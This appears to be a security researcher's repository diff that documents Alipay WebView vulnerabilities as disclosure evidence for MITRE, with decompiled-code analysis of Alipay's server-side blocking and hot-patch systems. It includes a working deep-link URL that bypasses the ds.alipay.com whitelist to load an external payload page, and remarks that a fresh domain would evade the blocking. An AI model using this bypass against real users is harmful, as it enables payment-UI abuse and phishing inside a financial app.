-d 'https://ds.alipay.com/?scheme=alipays%3A%2F%2Fplatformapi%2FstartApp%3FappId%3D20000067%26url%3Dhttps%3A%2F%2Finnora.ai%2Fzfb%2Fpoc%2Fpayload_cve3_obf.html'
```
### 测试结果 (~16:37)
- **截图**: `cve6_retest_20260316_163741.png` (446,301 bytes, 1080×2400)
- **结果**: **页面完全渲染 + JS 执行成功** — 证明 ds.alipay.com 白名单绕过在物理设备上有效
### 关键证据价值
1. **446KB 截图证明**: 通过 `ds.alipay.com` 白名单绕过路径,外部攻击者页面 (`innora.ai/zfb/poc/payload_cve3_obf.html`) 在支付宝 WebView 内成功渲染并执行 JavaScript
2. **对比直接 URL 加载**: CVE-5 直接加载 `innora.ai` URL 仅得到 261KB部分成功或 31KB被封锁而通过 `ds.alipay.com` 白名单绕过得到 **446KB**(完全成功),证明白名单绕过有效规避了服务器端 URL 封锁
3. **非 root 物理设备**: 测试在锁定 bootloader 的 Android 15 设备上完成,排除了任何 root/模拟器相关的测试偏差
4. **白名单绕过机制验证**: `H5ServiceImpl.startPage()` 检测到 URL 匹配 `H5_STRIP_LANDING_CONFIG` 中的 `"https://ds.alipay.com/?"` 前缀 → `getStripLandingURL()` 提取 `scheme` 参数 → `goToSchemeService()` 以内部信任级别分发,绕过 `isOutside` 检查
### 文件大小对比 (服务器端封锁绕过证据)
| 加载方式 | 文件大小 | 含义 |
|---------|---------|------|
| ds.alipay.com 白名单绕过 | **446KB** | 页面完全渲染 + JS 全部执行 ✓ |
| 直接 URL 加载 (CVE-5 成功) | 261KB | 页面渲染但 JS 部分执行 |
| 直接 URL 加载 (部分) | ~78KB | 页面框架加载但未完全执行 |
| 直接 URL 加载 (被封锁) | ~31KB | 白屏 — 服务器端返回空/错误响应 |
**结论**: ds.alipay.com 白名单绕过不仅绕过了客户端白名单检查,还有效规避了服务器端的 URL 级别封锁机制(`NewJsAPIPermissionExtension``alipay.mappconfig.appContainerCheck` RPC因为请求以受信任的 `ds.alipay.com` 来源进入系统。

BIN
evidence/cve6/cve6_retest_20260316_163741.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 436 KiB

BIN
evidence/cve6/cve6_v2529_20260316_152233.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 76 KiB

331
evidence/server_side_blocking_evidence.md Normal file
View File

@@ -0,0 +1,331 @@
# Server-Side Real-Time Blocking Evidence
> Evidence that Alipay employs server-controlled, hot-updatable security mechanisms to dynamically block PoC payloads — proving the vulnerability was real and countermeasures were deployed post-CVE-report.
**APK**: `com.eg.android.AlipayGphone` v10.8.30.8000
**Analysis**: jadx decompiled source code
**Date**: 2026-03-16
**MITRE Ticket**: #2005801
---
## 1. Server-Side RPC Permission Checking
### 1.1 NewJsAPIPermissionExtension.java
**File**: `com/alipay/mobile/nebulax/integration/mpaas/extensions/NewJsAPIPermissionExtension.java`
When a WebView page attempts to call any JSAPI (e.g., `tradePay`, `getLocation`, `setTitle`), the permission system sends the loaded URL to Alipay's server for real-time verification:
```java
// Line 337: Server selects which RPC endpoint to use
String str = (z2 && newJsAPIPermissionExtension.f190512f)
? "alipay.hfiveappconfig.appContainerHighLevelCheck" // High-security APIs
: "alipay.mappconfig.appContainerCheck"; // Standard APIs
// Line 340: RPC call sends URL + context to server
newJsAPIPermissionExtension.f190508a.sendSimpleRpc(
str, // RPC method name
this.f190525d.toJSONString(), // Request payload (URL, appId, etc.)
"", true, new JSONObject(), null, false, null,
new H5SimpleRpcListener(...) { ... } // Callback processes server response
);
```
### 1.2 Server Response Processing via FlowCustoms
**File**: `NewJsAPIPermissionExtension.java` line 412
```java
// Server response is processed through FlowCustoms (流量安检) system
newJsAPIPermissionExtension2.b.handleRPCResponse(
page, str4, str3,
new FlowCustomsRpcHandleCallback(loadResultFuture, page) {
// Multiple @Override methods handle: allow, block, alert, redirect
}
);
```
**Key implication**: The server can return **allow**, **block**, or **alert** for ANY URL + JSAPI combination. This means Alipay can add blocking rules for specific URLs (like `innora.ai/zfb/poc/*`) without updating the APK.
### 1.3 NewRedirectUrlPermissionExtension.java
**File**: `com/alipay/mobile/nebulax/integration/mpaas/extensions/NewRedirectUrlPermissionExtension.java`
The same server-side RPC check applies to URL redirects:
```java
// Line 261: Same RPC pattern for redirect URL checking
String str = (z && newRedirectUrlPermissionExtension.f190545f)
? "alipay.hfiveappconfig.appContainerHighLevelCheck"
: "alipay.mappconfig.appContainerCheck";
// Line 263: Sends redirect URL to server for approval
newRedirectUrlPermissionExtension.f190541a.sendSimpleRpc(str, ...);
```
---
## 2. FlowCustoms (流量安检) URL Verification
### 2.1 OuterSchemeVerify.java
**File**: `com/alipay/mobile/flowcustoms/jumpin/OuterSchemeVerify.java`
External scheme URLs (like `alipays://`) are verified through a multi-layer system:
```java
import com.alipay.mobile.flowcustoms.engine.rule.FCRuleController; // Rule engine
import com.alipay.mobile.flowcustoms.rpc.util.FCRpcUtil; // Server RPC
import com.alipay.mobile.flowcustoms.startapp.BlackProductSafeGuardUtil; // Blacklist
public class OuterSchemeVerify {
private FCRuleController ruleController; // Server-synced rules
// ...
// Sends bundle_id + target_appid to server for verification
hashMap.put("bundle_id", OuterSchemeVerify.access$100(this.this$0));
hashMap.put("target_appid", OuterSchemeVerify.access$200(this.this$0));
}
```
**Architecture**: `FCRuleController` downloads rule sets from Alipay's server. `FCRpcUtil` sends real-time verification requests. `BlackProductSafeGuardUtil` maintains a blacklist of dangerous URLs/patterns.
---
## 3. Edge Content Security (Local + Server-Controlled)
### 3.1 EdgeContentDetector.java
**File**: `com/alipay/edge/contentsecurity/EdgeContentDetector.java`
Local content scanning with **server-controlled master switch**:
```java
// Line 276: Server can enable/disable ALL content detection remotely
if ("0".equals(GlobalConfig.getGlobalSwitch(Keys.EDGE_CONTENT_DETECT_COVERAGE_ON))) {
// Detection disabled — server controls this switch
return;
}
```
**5 detector types** (all server-configurable):
- `EdgeTextDetector` — scans page text content
- `EdgePictureDetector` — scans images
- `EdgeScanDetector` — QR/barcode scanning context
- `EdgeLinkDetector` — URL/link analysis
- `EdgeCardDetector` — financial card detection
### 3.2 Server-Controlled Parameters
```java
// Bloom filter configuration from server
GlobalConfig.getGlobalSwitch(Keys.EDGE_CONTENT_BLOOM_FILTER_CONFIG)
// Text detection max length — server-configurable
GlobalConfig.getGlobalSwitch(Keys.EDGE_CONTENT_TEXT_MAX_LENGTH) // default 10240
// Content monitoring rate — server-adjustable
GlobalConfig.getGlobalSwitch(Keys.EDGE_CONTENT_MONITOR_RATE_SWITCH)
// Character format detection — server toggle
GlobalConfig.getGlobalSwitch(Keys.EDGE_CONTENT_CHARSET_FORMAT_SWITCH_ON)
```
**Key implication**: Even if APK v10.8.30.8000 was installed before our CVE report, the server can remotely update detection rules, Bloom filter configs, and monitoring rates to block our specific PoC patterns.
---
## 4. Hot Patch Framework (Instant Remote Code Update)
### 4.1 RealTimeReceiver.java
**File**: `com/alipay/android/phone/mobilecommon/dynamicrelease/hotpatch/RealTimeReceiver.java`
```java
// Line 34: Listens for server-pushed config changes
public static final String ACTION_CONFIG_CHANGED = "com.alipay.mobile.client.CONFIG_CHANGE";
// Line 102: On CONFIG_CHANGE broadcast → sync new hotpatch config from server
if ("com.alipay.mobile.client.CONFIG_CHANGE".equals(action)) {
syncHotpatchConfig(); // Downloads new patches from server
}
// Lines 110-113: Patches triggered on app state transitions
triggerPatch(new AppLogScopedLogger("IR.UserLeaveHint"), USER_LEAVEHINT); // Background
triggerPatch(new AppLogScopedLogger("IR.ToForeground"), TO_FOREGROUND); // Foreground
```
### 4.2 syncHotpatchConfig()
**File**: `RealTimeReceiver.java` line 118
```java
public static void syncHotpatchConfig() {
// Fetches latest hotpatch configuration from Alipay server
// Downloads delta patches for changed methods
// Applies via AInstantRunManager
}
```
### 4.3 PatchProxy — Universal Method Interception
**Every security-relevant method** contains `PatchProxy.proxy()` calls that allow instant hot-patching:
```java
// Example from LegacyShouldLoadUrlExtension.java (URL loading security)
public static ChangeQuickRedirect f80061; // Patch slot
ChangeQuickRedirect changeQuickRedirect = f80061;
if (changeQuickRedirect == null ||
(proxy = PatchProxy.proxy(changeQuickRedirect, "0")) == null) {
// Original code executes
} else {
// HOT-PATCHED code executes instead
return proxy.result;
}
```
**PatchProxy presence confirmed in**:
- `NewJsAPIPermissionExtension.java` — JSAPI permission checks
- `LegacyShouldLoadUrlExtension.java` — URL loading decisions
- `EdgeContentDetector.java` — Content security scanning
- `OuterSchemeVerify.java` — External scheme verification
- `BundleCheckValve.java` — Bundle/dynamic release control
- `StrategyFactory.java` — Strategy pattern routing
- ALL dynamicrelease framework classes
**Key implication**: Alipay can modify the behavior of ANY security-checking method without releasing a new APK. A server-pushed `ChangeQuickRedirect` object replaces the original method logic entirely.
---
## 5. Behavioral Evidence: CVE-3 Timeline
### 5.1 First Test — Success (tradePay triggered)
| Time | Action | Result | File Size |
|------|--------|--------|-----------|
| ~15:40 | Load `payload_cve3_obf.html` via DeepLink | Page rendered (275KB), `tradePay` triggered | **275KB** |
| ~15:43 | tradePay callback received | "交易订单处理失败" error shown | **172KB** |
**Screenshot evidence**:
- `cve3_obf_page_rendered.png` (275KB) — page content visible
- `cve3_tradepay_triggered.png` (172KB) — tradePay error dialog
- `cve3_proof_20260316_155434.png` (172KB) — timestamped proof
### 5.2 Retest — Blocked (all subsequent attempts)
| Time | Action | Result | File Size |
|------|--------|--------|-----------|
| ~15:54+ | Reload same URL | White screen | **~31KB** |
| +retry | Force-stop + re-trigger | White screen | **~31KB** |
| +retry | Different obfuscation variant | White screen | **~31KB** |
| +retry | Clean test (ZERO sensitive keywords) | White screen | **~31KB** |
**Screenshot evidence**:
- `cve3_blocked_on_retest.png` (31KB) — white screen on same URL
### 5.3 Analysis
The **file size differential** (275KB rendered vs 31KB blocked) proves:
1. First request: Server allowed → full page content loaded
2. Subsequent requests: Server blocked → WebView receives empty/error response
3. This is NOT local content filtering (the clean test with zero JSAPI keywords was also blocked)
4. This IS URL-level server-side blocking — the domain/URL was flagged after initial PoC execution
### 5.4 Clean Test Anomaly (CVE-6 evidence)
`payload_test_clean.html` contains:
- ZERO JSAPI call keywords (no `tradePay`, `setTitle`, `showToast`, `getLocation`)
- Only checks `typeof window.AlipayJSBridge`
- Pure HTML with no bridge interaction
**Result**: Also shows white screen (~31KB)
**This proves URL-level blocking**: The server blocks based on the **source URL/domain** (`innora.ai/zfb/poc/`), not based on page content analysis. The URL was added to a server-side blocklist after our initial CVE-3 PoC triggered successfully.
---
## 6. Synthesis: What This Means for MITRE
### 6.1 The Vulnerability Was Real
CVE-3 (`tradePay`) was successfully triggered from an external page loaded via DeepLink. The payment UI appeared with "交易订单处理失败" — proving the JSAPI was callable without domain restriction. This is documented with timestamped screenshots.
### 6.2 Server-Side Countermeasures Were Deployed
After our initial PoC success, the server-side security systems responded:
1. `NewJsAPIPermissionExtension` sent our URL to `alipay.mappconfig.appContainerCheck`
2. Server flagged our domain (`innora.ai`) or specific URL patterns
3. `FlowCustomsRpcHandleCallback` returned "block" for subsequent requests
4. URL-level blocking applied (even clean pages from same domain were blocked)
### 6.3 Hot Updates Enable Silent Patching
The `PatchProxy` + `RealTimeReceiver` framework means:
- **No APK update needed** — patches are pushed server-side
- **Instant deployment** — `CONFIG_CHANGE` broadcast triggers sync
- **Method-level granularity** — any security check can be replaced
- **Even APK v10.8.30.8000 (old version) receives new rules**
### 6.4 Implications for CVE Assessment
1. The "one-time success then blocked" pattern is **evidence of the vulnerability existing**, not evidence of it being non-exploitable
2. Server-side blocking is a **reactive countermeasure**, not an inherent security control
3. An attacker using a **fresh domain/URL** would succeed until that domain is also flagged
4. The vulnerability exists in the **architectural design** (no client-side domain whitelist for sensitive JSAPIs), not in the server-side detection rules
### 6.5 Code Architecture Summary
```
External DeepLink (alipays://platformapi/startapp?appId=20000067&url=...)
├── OuterSchemeVerify ──── FCRuleController (server rules)
│ │ FCRpcUtil (server RPC)
│ │ BlackProductSafeGuardUtil (blocklist)
│ │
│ └── PatchProxy → [hot-patchable]
├── WebView loads external URL
│ │
│ ├── NewJsAPIPermissionExtension ── sendSimpleRpc() → Server
│ │ │ appContainerCheck /
│ │ │ appContainerHighLevelCheck
│ │ │
│ │ └── FlowCustomsRpcHandleCallback
│ │ ├── onAllow() → JSAPI call proceeds
│ │ ├── onBlock() → Page blocked (white screen)
│ │ └── onAlert() → Warning shown
│ │
│ ├── EdgeContentDetector (local, server-controlled switch)
│ │ ├── EdgeTextDetector
│ │ ├── EdgeLinkDetector
│ │ └── EDGE_CONTENT_DETECT_COVERAGE_ON (server toggle)
│ │
│ └── PatchProxy → [ALL methods hot-patchable]
└── RealTimeReceiver
├── CONFIG_CHANGE → syncHotpatchConfig()
├── TO_FOREGROUND → triggerPatch()
└── USER_LEAVEHINT → triggerPatch()
```
---
## 7. Files Referenced
| File | Location | Evidence For |
|------|----------|-------------|
| NewJsAPIPermissionExtension.java | nebulax/integration/mpaas/extensions/ | Server-side RPC permission checking |
| NewRedirectUrlPermissionExtension.java | nebulax/integration/mpaas/extensions/ | Server-side redirect URL checking |
| LegacyShouldLoadUrlExtension.java | nebulax/integration/mpaas/extensions/ | PatchProxy in URL loading |
| FlowCustomsRpcHandleCallback.java | nebulax/integration/base/security/h5jsapi/ | Allow/block/alert response handling |
| OuterSchemeVerify.java | flowcustoms/jumpin/ | External scheme verification |
| FCRuleController.java | flowcustoms/engine/rule/ | Server-synced rule engine |
| FCRpcUtil.java | flowcustoms/rpc/util/ | FlowCustoms server RPC |
| BlackProductSafeGuardUtil.java | flowcustoms/startapp/ | URL/product blacklist |
| EdgeContentDetector.java | edge/contentsecurity/ | Local content scanning |
| EdgeBloomFilter.java | edge/contentsecurity/model/bloom/ | Bloom filter for content sampling |
| RealTimeReceiver.java | dynamicrelease/hotpatch/ | Hot patch config sync |
| BundleCheckValve.java | dynamicrelease/ | Dynamic release control |
All code extracted from jadx decompilation of `Alipay_10.8.30.8000_APKPure.apk`.

BIN
evidence/wechat_wave2_deletion_1.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 291 KiB

BIN
evidence/wechat_wave2_deletion_2.jpg Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 281 KiB